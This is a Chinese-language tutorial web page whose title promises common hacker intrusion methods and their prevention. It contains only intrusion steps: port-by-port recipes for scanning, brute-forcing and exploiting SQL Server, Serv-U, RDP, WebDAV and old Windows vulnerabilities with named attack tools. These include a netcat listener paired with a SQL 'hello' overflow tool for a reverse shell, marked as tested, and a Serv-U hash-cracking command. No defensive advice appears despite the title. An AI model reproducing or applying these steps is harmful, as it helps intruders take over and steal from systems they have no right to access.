學習啦 > 學習電腦 > 電腦安全 > 網(wǎng)絡(luò)安全知識 > 常見的黑客入侵方法與防范

常見的黑客入侵方法與防范

時間: 權(quán)威724 分享

常見的黑客入侵方法與防范

  本文簡單介紹目前黑客最常使用的一些入侵工具及防御的方法,希望能對大家有所幫助,以助于大家能更好地防御黑客的攻擊,下面學習啦小編來告訴你吧!

  1. 利用4899端口入侵

  4899端口是一個遠程控制軟件(remote administrator)服務(wù)端監(jiān)聽的端口,他不能算是一個木馬程序,但是具有遠程控制功能,通常殺毒軟件是無法查出它來的

  用4899過濾器.exe,掃描空口令的機器

  2. 利用3899的入侵

  對很早的機器,可以試試3389的溢出

  對2000的機器,可以試試字典暴破。

  3.利用1433端口入侵

  1433端口,是SQL Server默認的端口,SQL Server服務(wù)使用兩個端口:TCP-1433、UDP-1434。其中1433用于供SQL Server對外提供服務(wù),1434用于向請求者返回SQL Server使用了哪個TCP/IP端口。

  scanport.exe 查有1433的機器

  SQLScanPass.exe 進行字典暴破(字典是關(guān)鍵)

  最后 SQLTools.exe入侵

  對sql的sp2及以下的系統(tǒng),可用sql的hello 溢出漏洞入侵。

  nc -vv -l -p 本機端口 sqlhelloF.exe 入侵ip 1433 本機ip 本機端口

  (以上反向的,測試成功)

  sqlhelloz.exe 入侵ip 1433 (這個是正向連接)

  4. 利用80端口入侵

  80端口是為HTTP(HyperText Transport Protocol)即超文本傳輸協(xié)議開放的,此為上網(wǎng)沖浪使用次數(shù)最多的協(xié)議,主要用于WWW(World Wide Web)即萬維網(wǎng)傳輸信息的協(xié)議??梢酝ㄟ^HTTP地址(即常說的“網(wǎng)址”)加“:80”來訪問網(wǎng)站,因為瀏覽網(wǎng)頁服務(wù)默認的端口號都是80,因此只需輸入網(wǎng)址即可,不用輸入“:80”了。

  對sp3以前的機器,可以用webdav入侵;

  對bbs論壇,可以試試上傳漏洞(upfile.exe或dvup_delphi.exe)

  可以利用SQL進行注入。(小榕的注入軟件)。

  5. 利用serv-u入侵(21端口)

  21端口主要用于FTP(File Transfer Protocol,文件傳輸協(xié)議)服務(wù),F(xiàn)TP服務(wù)主要是為了在兩臺計算機之間實現(xiàn)文件的上傳與下載,一臺計算機作為FTP客戶端,另一臺計算機作為FTP服務(wù)器,可以采用匿名(anonymous)登錄和授權(quán)用戶名與密碼登錄兩種方式登錄FTP服務(wù)器。

  對5. 004及以下系統(tǒng),可用溢出入侵。(serv5004.exe)

  對5.1.0.0及以下系統(tǒng),可用本地提升權(quán)限。(servlocal.exe)

  對serv-u的MD5加密密碼,可以用字典暴破。(crack.vbs)

  輸入一個被serv-u加密的密碼(34位長),通過與字典檔(dict.txt)的比較,得到密碼。如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A

  6. 利用554端口

  用real554.exe入侵。

  7. 利用6129端口

  用DameWare6129.exe入侵。

  8. 利用系統(tǒng)漏洞

  利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,

  進行溢出入侵。

  9. 利用3127等端口

  可以利用doom病毒開的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。

  10. 利用其他入侵

  利用shanlu的入侵軟件入侵(WINNTAutoAttack.exe)。

512264